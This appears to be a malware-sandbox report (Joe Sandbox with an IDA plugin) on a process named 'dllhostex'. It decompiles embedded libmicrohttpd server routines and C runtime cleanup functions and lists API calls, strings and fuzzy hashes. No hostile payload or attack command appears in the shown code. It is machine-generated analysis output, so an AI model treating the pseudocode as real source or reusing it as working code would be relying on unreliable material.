                                                								_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                								L38:
                                                								_push(E0135B8FA(2));
                                                								E012938B0(_t120);
                                                								E0135D32E(_t120, E0135B8FA(2));
                                                								_t169 = _t163 + 0x20;
                                                								E0135EBB9(_t110, _t120, _t128, _t134, _t141);
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								_t170 = _t169 - 0x14;
                                                								__eflags =  *(_t120 + 0xe4) & 0x00000004;
                                                								_t84 = _t128;
                                                								_push(_t110);
                                                								_push(_t152);
                                                								_push(_t141);
                                                								_push(_t134);
                                                								_v44 = _t84;
                                                								_v48 = _t120;
                                                								if(( *(_t120 + 0xe4) & 0x00000004) == 0) {
                                                									__eflags =  *((char*)(_t120 + 0xc8));
                                                									if( *((char*)(_t120 + 0xc8)) == 0) {
                                                										_t123 =  *(_t120 + 0x2c);
                                                										asm("xorps xmm0, xmm0");
                                                										asm("movlpd [esp+0x18], xmm0");
                                                										_t85 = 0;
                                                										_t136 = _v36;
                                                										_t143 = _v40;
                                                										__eflags = _t123;
                                                										while(_t123 != 0) {
                                                											_t116 =  *(_t123 + 0x90);
                                                											_t128 =  *(_t123 + 0x94);
                                                											__eflags = _t116;
                                                											if(_t116 != 0) {
                                                												L47:
                                                												__eflags = _t85;
                                                												if(_t85 == 0) {
                                                													L51:
                                                													_t136 =  *(_t123 + 0x8c);
                                                													_t143 =  *((intOrPtr*)(_t123 + 0x88)) + _t116;
                                                													asm("adc edi, edx");
                                                												} else {
                                                													_t160 = _t143 -  *((intOrPtr*)(_t123 + 0x88));
                                                													asm("sbb eax, [ecx+0x8c]");
                                                													__eflags = _t136 - _t128;
                                                													if(__eflags >= 0) {
                                                														if(__eflags > 0) {
                                                															goto L51;
                                                														} else {
                                                															__eflags = _t160 - _t116;
                                                															if(_t160 > _t116) {
                                                																goto L51;
                                                															}
                                                														}
                                                													}
                                                												}
                                                												_t85 = 1;
                                                											} else {
                                                												__eflags = _t128;
                                                												if(_t128 != 0) {
                                                													goto L47;
                                                												}
                                                											}
                                                											_t123 =  *(_t123 + 0xc);
                                                											__eflags = _t123;
                                                										}
                                                										_t125 =  *(_v48 + 0x24);
                                                										__eflags = _t125;
                                                										if(_t125 == 0) {
                                                											L62:
                                                											__eflags = _t85;
                                                											if(_t85 == 0) {
                                                												goto L41;
                                                											} else {
                                                												goto L63;
                                                											}
                                                										} else {
                                                											_t115 =  *(_t125 + 0x90);
                                                											_t128 =  *(_t125 + 0x94);
                                                											__eflags = _t115;
                                                											if(_t115 != 0) {
                                                												L57:
                                                												__eflags = _t85;
                                                												if(_t85 == 0) {
                                                													L61:
                                                													_t136 =  *(_t125 + 0x8c);
                                                													_t143 =  *((intOrPtr*)(_t125 + 0x88)) + _t115;
                                                													asm("adc edi, edx");
                                                												} else {
                                                													_t85 = _t136;
                                                													_t158 = _t143 - _t115;
                                                													asm("sbb eax, edx");
                                                													__eflags = _t136 -  *(_t125 + 0x8c);
                                                													if(__eflags >= 0) {
                                                														if(__eflags > 0) {
                                                															goto L61;
                                                														} else {
                                                															__eflags = _t158 -  *((intOrPtr*)(_t125 + 0x88));
                                                															if(_t158 >  *((intOrPtr*)(_t125 + 0x88))) {
                                                																goto L61;
                                                															}
                                                														}
                                                													}
                                                												}
                                                												L63:
                                                												__imp__GetTickCount64();
                                                												asm("sbb edx, [0x13d5ce4]");
                                                												_t88 = E01354180(_t85 -  *0x13d5ce0, _t128, 0x3e8, 0);
                                                												__eflags = _t136 - _t128;
                                                												if(__eflags > 0) {
                                                													L67:
                                                													_t145 = _t143 - _t88;
                                                													asm("sbb edi, edx");
                                                													__eflags = _t136 - 0x418937;
                                                													if(__eflags < 0) {
                                                														L71:
                                                														_t91 = _t145;
                                                														_t92 = _t91 * 0x3e8;
                                                														_t127 = _t136 * 0x3e8 + (_t91 * 0x3e8 >> 0x20);
                                                														__eflags = _t127;
                                                													} else {
                                                														if(__eflags > 0) {
                                                															L70:
                                                															_t92 = _t88 | 0xffffffff;
                                                															_t127 = _t125 | 0xffffffff;
                                                														} else {
                                                															__eflags = _t145 - 0x4bc6a7ef;
                                                															if(_t145 <= 0x4bc6a7ef) {
                                                																goto L71;
                                                															} else {
                                                																goto L70;
                                                															}
                                                														}
                                                													}
                                                												} else {
                                                													if(__eflags < 0) {
                                                														L66:
                                                														asm("xorps xmm0, xmm0");
                                                														asm("movlpd [esp+0x18], xmm0");
                                                														_t127 = _v36;
                                                														_t92 = _v40;
                                                													} else {
                                                														__eflags = _t143 - _t88;
                                                														if(_t143 >= _t88) {
                                                															goto L67;
                                                														} else {
                                                															goto L66;
                                                														}
                                                													}
                                                												}
                                                												_t132 = _v44;
                                                												 *_t132 = _t92;
                                                												_t132[1] = _t127;
                                                												return 1;
                                                											} else {
                                                												__eflags = _t128;
                                                												if(_t128 == 0) {
                                                													goto L62;
                                                												} else {
                                                													goto L57;
                                                												}
                                                											}
                                                										}
                                                									} else {
                                                										 *_t84 = 0;
                                                										 *(_t84 + 4) = 0;
                                                										return 1;
                                                									}
                                                								} else {
                                                									_push("Illegal call to MHD_get_timeout\n");
                                                									_push(_t120);
                                                									E01351E90();
                                                									_t170 = _t170 + 8;
                                                									L41:
                                                									__eflags = 0;
                                                									return 0;
                                                								}
                                                							} else {
                                                								if(_t71 != 0) {
                                                									goto L8;
                                                								} else {
                                                									 *(_t134 + 0x18) = _t119;
                                                								}
                                                								L9:
                                                								_t120 =  *_t141;
                                                								_t72 = _t141[1];
                                                								if(_t120 != 0) {
                                                									 *(_t120 + 4) = _t72;
                                                								} else {
                                                									 *(_t134 + 0x1c) = _t72;
                                                								}
                                                								 *_t141 = 0;
                                                								_t141[1] = 0;
                                                								 *_t128(_t152);
                                                								if(( *(_t134 + 0xe4) & 0x00000004) == 0 || _t141[0x29] != 0) {
                                                									L16:
                                                									_t74 = _t141[0x36];
                                                									if(_t141[0x36] != 0) {
                                                										_t141[0x36] = 0;
                                                										E0135C9E5(_t74);
                                                										_t163 = _t163 + 4;
                                                									}
                                                									_t110 = _t141[8];
                                                									if(_t110 != 0) {
                                                										_t102 =  *_t110;
                                                										if(_t110[4] != 0) {
                                                											VirtualFree(_t102, 0, 0x8000);
                                                										} else {
                                                											E0135C9E5(_t102);
                                                											_t163 = _t163 + 4;
                                                										}
                                                										E0135C9E5(_t110);
                                                										_t163 = _t163 + 4;
                                                									}
                                                									_t121 =  *((intOrPtr*)(_t134 + 0x40));
                                                									if(_t121 != 0) {
                                                										 *_t121( *((intOrPtr*)(_t134 + 0x44)), _t141,  &(_t141[0xa]), 1);
                                                										_t163 = _t163 + 0x10;
                                                									}
                                                									_t75 = E013490A0(_t110, _t134, _t141[0x13], _t134, _t152, _t141[0x21]);
                                                									_t120 = _t141[7];
                                                									_t165 = _t163 + 4;
                                                									if(_t120 != 0) {
                                                										E0134D9F0(_t75, _t120);
                                                										_t141[7] = 0;
                                                									}
                                                									_t76 = _t141[0x28];
                                                									if(_t76 == 0xffffffff) {
                                                										L29:
                                                										_t77 = _t141[0x13];
                                                										if(_t141[0x13] != 0) {
                                                											E0135C9E5(_t77);
                                                											_t165 = _t165 + 4;
                                                										}
                                                										E0135C9E5(_t141);
                                                										_t163 = _t165 + 4;
                                                										EnterCriticalSection(_t152);
                                                										 *((intOrPtr*)(_t134 + 0xcc)) =  *((intOrPtr*)(_t134 + 0xcc)) - 1;
                                                										_t128 = LeaveCriticalSection;
                                                										 *((char*)(_t134 + 0xc6)) = 0;
                                                										_t141 =  *(_t134 + 0x1c);
                                                										_t70 = _t141;
                                                										if(_t141 != 0) {
                                                											continue;
                                                										} else {
                                                											goto L33;
                                                										}
                                                									} else {
                                                										__imp__#3(_t76);
                                                										if(_t76 != 0) {
                                                											goto L36;
                                                										} else {
                                                											goto L29;
                                                										}
                                                									}
                                                								} else {
                                                									if(WaitForSingleObject(_t141[0x14], 0xffffffff) != 0) {
                                                										 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0xbdf, "Failed to join a thread\n");
                                                										_t165 = _t163 + 0x10;
                                                										L36:
                                                										 *0x13d5870( *0x13d5874, "c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c", 0xc14, "Close socket failed.\n");
                                                										_t163 = _t165 + 0x10;
                                                										break;
                                                									} else {
                                                										CloseHandle(_t141[0x14]);
                                                										goto L16;
                                                									}
                                                								}
                                                							}
                                                						}
                                                						goto L73;
                                                					}
                                                					_push("(NULL != (pos)->next) || ((pos) == (daemon->cleanup_tail))");
                                                					_push(0xbd9);
                                                					_push("c:\\lib\\x86\\libmicrohttpd-0.9.59\\src\\microhttpd\\daemon.c");
                                                					_push("%s:%u Assertion failed: %s\nProgram aborted.\n");
                                                					goto L38;
                                                				}
                                                				L73:
                                                			}
                                                0x0134ae82
                                                0x0134ae82
                                                0x0134ae82
                                                0x0134ae8b
                                                0x0134ae91
                                                0x0134ae98
                                                0x0134aea4
                                                0x0134aecb
                                                0x0134aecb
                                                0x0134aed3
                                                0x0134aed6
                                                0x0134aee0
                                                0x0134aee5
                                                0x0134aee5
                                                0x0134aee8
                                                0x0134aeed
                                                0x0134aef3
                                                0x0134aef5
                                                0x0134af0a
                                                0x0134aef7
                                                0x0134aef8
                                                0x0134aefd
                                                0x0134aefd
                                                0x0134af11
                                                0x0134af16
                                                0x0134af16
                                                0x0134af19
                                                0x0134af1e
                                                0x0134af2a
                                                0x0134af2c
                                                0x0134af2c
                                                0x0134af3a
                                                0x0134af3f
                                                0x0134af42
                                                0x0134af47
                                                0x0134af49
                                                0x0134af4e
                                                0x0134af4e
                                                0x0134af55
                                                0x0134af5e
                                                0x0134af6f
                                                0x0134af6f
                                                0x0134af74
                                                0x0134af77
                                                0x0134af7c
                                                0x0134af7c
                                                0x0134af80
                                                0x0134af85
                                                0x0134af89
                                                0x0134af8f
                                                0x0134af95
                                                0x0134af9b
                                                0x0134afa2
                                                0x0134afa5
                                                0x0134afa9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134af60
                                                0x0134af61
                                                0x0134af69
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0134af69
                                                0x0134aeaf
                                                0x0134aebc
                                                0x0134afe6
                                                0x0134afec
                                                0x0134afef
                                                0x0134b004
                                                0x0134b00a
                                                0x00000000
                                                0x0134aec2
                                                0x0134aec5
                                                0x00000000
                                                0x0134aec5
                                                0x0134aebc
                                                0x0134aea4
                                                0x0134ae68
                                                0x00000000
                                                0x0134ae63
                                                0x0134b00d
                                                0x0134b012
                                                0x0134b017
                                                0x0134b01c
                                                0x00000000
                                                0x0134b01c
                                                0x00000000

                                                APIs
                                                • EnterCriticalSection.KERNEL32(?,73ED7B40,00000000,?,0000009C,?,0134B2F3), ref: 0134AE33
                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,0000009C,?,0134B2F3), ref: 0134AEB4
                                                • CloseHandle.KERNEL32(?,?,0000009C,?,0134B2F3), ref: 0134AEC5
                                                • VirtualFree.KERNEL32(?,00000000,00008000,?,0000009C,?,0134B2F3), ref: 0134AF0A
                                                • closesocket.WS2_32(?), ref: 0134AF61
                                                • EnterCriticalSection.KERNEL32(?,?,0000009C), ref: 0134AF89
                                                Strings
                                                • Failed to join a thread, xrefs: 0134AFD1
                                                • Close socket failed., xrefs: 0134AFEF
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AFF9
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134B01C
                                                • (NULL != (pos)->prev) || ((pos) == (daemon->cleanup_head)), xrefs: 0134AFBB
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AFDB
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AFC5
                                                • (NULL != (pos)->next) || ((pos) == (daemon->cleanup_tail)), xrefs: 0134B00D
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134B017
                                                • %s:%u Assertion failed: %sProgram aborted., xrefs: 0134AFCA
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalEnterSection$CloseFreeHandleObjectSingleVirtualWaitclosesocket
                                                • String ID: %s:%u Assertion failed: %sProgram aborted.$%s:%u Assertion failed: %sProgram aborted.$(NULL != (pos)->next) || ((pos) == (daemon->cleanup_tail))$(NULL != (pos)->prev) || ((pos) == (daemon->cleanup_head))$Close socket failed.$Failed to join a thread$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c
                                                • API String ID: 898329484-1037770307
                                                • Opcode ID: c01bfd79fc7003fed0eb15aa640fbfdefc989edf5e506fc26e4d6cf4fdd2341f
                                                • Instruction ID: 30648ac22c97d0238eb7020ab443fabbfc90979e95815cd11db5e2e74873b7b5
                                                • Opcode Fuzzy Hash: c01bfd79fc7003fed0eb15aa640fbfdefc989edf5e506fc26e4d6cf4fdd2341f
                                                • Instruction Fuzzy Hash: E651B3B0680711ABEB309B69DC05F16B7ECBF10B0DF00452DE95B97681E732F81487A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • accept.WS2_32(?,?,0000001C), ref: 0134AC88
                                                • WSAGetLastError.WS2_32 ref: 0134ACB0
                                                • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 0134ACD8
                                                • WSAGetLastError.WS2_32 ref: 0134AD22
                                                • closesocket.WS2_32(00000000), ref: 0134AD66
                                                  • Part of subcall function 01351D20: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 01351D32
                                                Strings
                                                • Failed to set nonblocking mode on incoming connection socket: %s, xrefs: 0134ACBE
                                                • Close socket failed., xrefs: 0134AD70
                                                • Failed to set noninheritable mode on incoming connection socket., xrefs: 0134ACE2
                                                • Hit process or system resource limit at FIRST connection. This is really bad as there is no sane way to proceed. Will try busy waiting for system resources to become magically available., xrefs: 0134ADA7
                                                • Hit process or system resource limit at %u connections, temporarily suspending accept(). Consider setting a lower MHD_OPTION_CONNECTION_LIMIT., xrefs: 0134ADF1
                                                • c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c, xrefs: 0134AD7A
                                                • Error accepting connection: %s, xrefs: 0134AD52
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$HandleInformationacceptclosesocketioctlsocket
                                                • String ID: Close socket failed.$Error accepting connection: %s$Failed to set nonblocking mode on incoming connection socket: %s$Failed to set noninheritable mode on incoming connection socket.$Hit process or system resource limit at %u connections, temporarily suspending accept(). Consider setting a lower MHD_OPTION_CONNECTION_LIMIT.$Hit process or system resource limit at FIRST connection. This is really bad as there is no sane way to proceed. Will try busy waiting for system resources to become magically available.$c:\lib\x86\libmicrohttpd-0.9.59\src\microhttpd\daemon.c
                                                • API String ID: 2685826277-4011873036
                                                • Opcode ID: 72c1161f9beca87bc2d36cd83d3ca1bacff73e95ac1821da3bee9230dadd8203
                                                • Instruction ID: 3978ac4ac5e156a2fc8379c23713a4a73ef935b81c0d18dae620311ebcf0a566
                                                • Opcode Fuzzy Hash: 72c1161f9beca87bc2d36cd83d3ca1bacff73e95ac1821da3bee9230dadd8203
                                                • Instruction Fuzzy Hash: 89416B31A443415BE724AB3CDC44F7FBBE9AB95B1DF44062DF85A93290EB74A8448393
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __WSAFDIsSet.WS2_32(?,00000800), ref: 0134B469
                                                • __WSAFDIsSet.WS2_32(?,00000800), ref: 0134B604
                                                  • Part of subcall function 0134A8B0: EnterCriticalSection.KERNEL32(?,00000000,?,?,0000009C), ref: 0134A8E3
                                                • __WSAFDIsSet.WS2_32(?,00000800), ref: 0134B4E4
                                                • __WSAFDIsSet.WS2_32(?,?), ref: 0134B7A8
                                                • __aulldiv.LIBCMT ref: 0134B8B7
                                                • Sleep.KERNEL32(?,?,00000000,?,?,0000009C,0134C0BF), ref: 0134B926
                                                • select.WS2_32(00000000,?,?,?,00000000), ref: 0134B948
                                                • WSAGetLastError.WS2_32(?,0000009C,0134C0BF), ref: 0134B95F
                                                Strings
                                                • Could not obtain daemon fdsets, xrefs: 0134B66C
                                                • Could not add control inter-thread communication channel FD to fdset, xrefs: 0134B7CD
                                                • select failed: %s, xrefs: 0134B974
                                                • Could not add listen socket to fdset, xrefs: 0134B6B4
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalEnterErrorLastSectionSleep__aulldivselect
                                                • String ID: Could not add control inter-thread communication channel FD to fdset$Could not add listen socket to fdset$Could not obtain daemon fdsets$select failed: %s
                                                • API String ID: 3456594406-253196239
                                                • Opcode ID: ddfae7688e35a48217f87d24c331fc0146cb07177de4916bb91595124c1dc8cf
                                                • Instruction ID: c17f6ff98c0e5e90279bc640bd7f30a32a5bb5ddbfeaccdd1854ffd551a9532e
                                                • Opcode Fuzzy Hash: ddfae7688e35a48217f87d24c331fc0146cb07177de4916bb91595124c1dc8cf
                                                • Instruction Fuzzy Hash: 0D12C5315053518BD734DE28C49476EFBE9FF8436CF180A2DEA9997299D730F9408B92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0136EA6F(intOrPtr _a4) {
                                                				intOrPtr _v8;
                                                				intOrPtr _t25;
                                                				intOrPtr* _t26;
                                                				intOrPtr _t28;
                                                				intOrPtr* _t29;
                                                				intOrPtr* _t31;
                                                				intOrPtr* _t45;
                                                				intOrPtr* _t46;
                                                				intOrPtr* _t47;
                                                				intOrPtr* _t55;
                                                				intOrPtr* _t70;
                                                				intOrPtr _t74;
                                                
                                                				_t74 = _a4;
                                                				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                				if(_t25 != 0 && _t25 != 0x13cc300) {
                                                					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                					if(_t45 != 0 &&  *_t45 == 0) {
                                                						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                						if(_t46 != 0 &&  *_t46 == 0) {
                                                							E013656E2(_t46);
                                                							E0136DE51( *((intOrPtr*)(_t74 + 0x88)));
                                                						}
                                                						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                						if(_t47 != 0 &&  *_t47 == 0) {
                                                							E013656E2(_t47);
                                                							E0136E308( *((intOrPtr*)(_t74 + 0x88)));
                                                						}
                                                						E013656E2( *((intOrPtr*)(_t74 + 0x7c)));
                                                						E013656E2( *((intOrPtr*)(_t74 + 0x88)));
                                                					}
                                                				}
                                                				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                				if(_t26 != 0 &&  *_t26 == 0) {
                                                					E013656E2( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                					E013656E2( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                					E013656E2( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                					E013656E2( *((intOrPtr*)(_t74 + 0x8c)));
                                                				}
                                                				E0136EBE2( *((intOrPtr*)(_t74 + 0x9c)));
                                                				_t28 = 6;
                                                				_t55 = _t74 + 0xa0;
                                                				_v8 = _t28;
                                                				_t70 = _t74 + 0x28;
                                                				do {
                                                					if( *((intOrPtr*)(_t70 - 8)) != 0x13cc438) {
                                                						_t31 =  *_t70;
                                                						if(_t31 != 0 &&  *_t31 == 0) {
                                                							E013656E2(_t31);
                                                							E013656E2( *_t55);
                                                						}
                                                						_t28 = _v8;
                                                					}
                                                					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                						_t22 = _t70 - 4; // 0xfffffe7b
                                                						_t29 =  *_t22;
                                                						if(_t29 != 0 &&  *_t29 == 0) {
                                                							E013656E2(_t29);
                                                						}
                                                						_t28 = _v8;
                                                					}
                                                					_t55 = _t55 + 4;
                                                					_t70 = _t70 + 0x10;
                                                					_t28 = _t28 - 1;
                                                					_v8 = _t28;
                                                				} while (_t28 != 0);
                                                				return E013656E2(_t74);
                                                			}
















                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 0136EAB3
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DE6E
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DE80
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DE92
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DEA4
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DEB6
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DEC8
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DEDA
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DEEC
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DEFE
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DF10
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DF22
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DF34
                                                  • Part of subcall function 0136DE51: _free.LIBCMT ref: 0136DF46
                                                • _free.LIBCMT ref: 0136EAA8
                                                  • Part of subcall function 013656E2: HeapFree.KERNEL32(00000000,00000000,?,01363C72), ref: 013656F8
                                                  • Part of subcall function 013656E2: GetLastError.KERNEL32(?,?,01363C72), ref: 0136570A
                                                • _free.LIBCMT ref: 0136EACA
                                                • _free.LIBCMT ref: 0136EADF
                                                • _free.LIBCMT ref: 0136EAEA
                                                • _free.LIBCMT ref: 0136EB0C
                                                • _free.LIBCMT ref: 0136EB1F
                                                • _free.LIBCMT ref: 0136EB2D
                                                • _free.LIBCMT ref: 0136EB38
                                                • _free.LIBCMT ref: 0136EB70
                                                • _free.LIBCMT ref: 0136EB77
                                                • _free.LIBCMT ref: 0136EB94
                                                • _free.LIBCMT ref: 0136EBAC
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.968853301.0000000001291000.00000020.00000001.01000000.00000005.sdmp, Offset: 01290000, based on PE: true
                                                • Associated: 00000010.00000002.968837969.0000000001290000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969220651.00000000013CE000.00000008.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969243835.00000000013D3000.00000004.00000001.01000000.00000005.sdmp
                                                • Associated: 00000010.00000002.969258828.00000000013D6000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_1290000_dllhostex.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID:
                                                • API String ID: 161543041-0
                                                • Opcode ID: aa859a7ed2b4aa454827c594682651d5dc7c9a302ca0117b1b5bd91149e75dfc
                                                • Instruction ID: 793af1d35e5470341c5dcb10078505aa3f615795806c3c3a3c3c71671c10d5a2
                                                • Opcode Fuzzy Hash: aa859a7ed2b4aa454827c594682651d5dc7c9a302ca0117b1b5bd91149e75dfc
                                                • Instruction Fuzzy Hash: EB315F355482069FEB219A7CEC44B5A77EEFF10368F64D439E459D7158DE70AC48CB20
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 60%
                                                			E0133D720(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __ebp) {
                                                				signed int _v4;
                                                				int _v8;
                                                				struct _INPUT_RECORD _v24;
                                                				long _v28;
                                                				short _v30;
                                                				short _v32;
                                                				intOrPtr _v36;
                                                				struct _INPUT_RECORD _v44;
                                                				long _v48;
                                                				long _v52;
                                                				void* __esi;
                                                				signed int _t48;
                                                				signed int _t50;
                                                				long _t82;
                                                				signed char _t87;
                                                				short _t90;
                                                				void* _t95;
                                                				short _t96;
                                                				void* _t101;
                                                				intOrPtr _t102;
                                                				void* _t104;
                                                				void* _t107;
                                                				void* _t108;
                                                				intOrPtr _t111;
                                                				void* _t113;
                                                				void* _t114;
                                                				void* _t115;
                                                				void* _t119;
                                                
                                                				_t115 = __ebp;
                                                				_t101 = __edi;
                                                				_t95 = __edx;
                                                				_t120 = _t119 - 0x34;
                                                				_t48 =  *0x13cc074; // 0x4132269f
                                                				_v4 = _t48 ^ _t119 - 0x00000034;
                                                				_t107 = __ecx;
                                                				_t87 =  *(__ecx + 0x2c) & 0xffffefff;
                                                				_t3 = __ecx + 0x40;
                                                				 *_t3 =  *((intOrPtr*)(__ecx + 0x40)) + 0xffffffff;
                                                				 *(__ecx + 0x2c) = _t87;
                                                				_t50 = _t87;
                                                				if( *_t3 == 0 && (_t87 & 0x00000001) == 0 && (_t87 & 0x00000004) != 0) {
                                                					_t50 = _t50 & 0xfffffffb;
                                                					 *(__ecx + 0x2c) = _t50;
                                                					if((_t50 & 0x00000008) != 0) {
                                                						 *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 4)) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + 4)) - 1;
                                                						_t50 =  *(__ecx + 0x2c);
                                                					}
                                                				}
                                                				if((_t50 & 0x00010000) == 0) {
                                                					L24:
                                                					_pop(_t108);
                                                					return E01353717(_v4 ^ _t120, _t108);
                                                				} else {
                                                					if((_t50 & 0x02000000) == 0) {
                                                						if((_t50 & 0x00200000) != 0) {
                                                							goto L24;
                                                						} else {
                                                							_t82 = 0;
                                                							if(WaitForSingleObject( *0x13d5b4c, 0xffffffff) != 0) {
                                                								L25:
                                                								E0135EBB9(_t82, _t87, _t95, _t101, _t107);
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								_t96 =  *((short*)(_t87 + 6));
                                                								_push(_t107);
                                                								 *0x13cd65c =  *_t87;
                                                								_push(_t101);
                                                								_t102 =  *0x13cd64c; // 0xffffffff
                                                								_t111 =  *((short*)(_t87 + 0x10)) -  *((short*)(_t87 + 0xc)) + 1;
                                                								 *0x13cd650 = _t111;
                                                								if(_t102 != 0xffffffff) {
                                                									_t96 =  <  ? _t96 - _t111 + 1 : _t102;
                                                								}
                                                								_t90 =  *((short*)(_t87 + 2));
                                                								if(_t111 + _t96 > _t90) {
                                                									_t96 = _t90 - _t111;
                                                								}
                                                								_t97 =  <  ? 0 : _t96;
                                                								 *0x13cd64c =  <  ? 0 : _t96;
                                                								return 0;
                                                							} else {
                                                								_t87 = 0x13d5b2c;
                                                								 *0x13d5b2c = 2;
                                                								if( *0x13d5b2c == 1) {
                                                									_push(_t115);
                                                									_push(_t101);
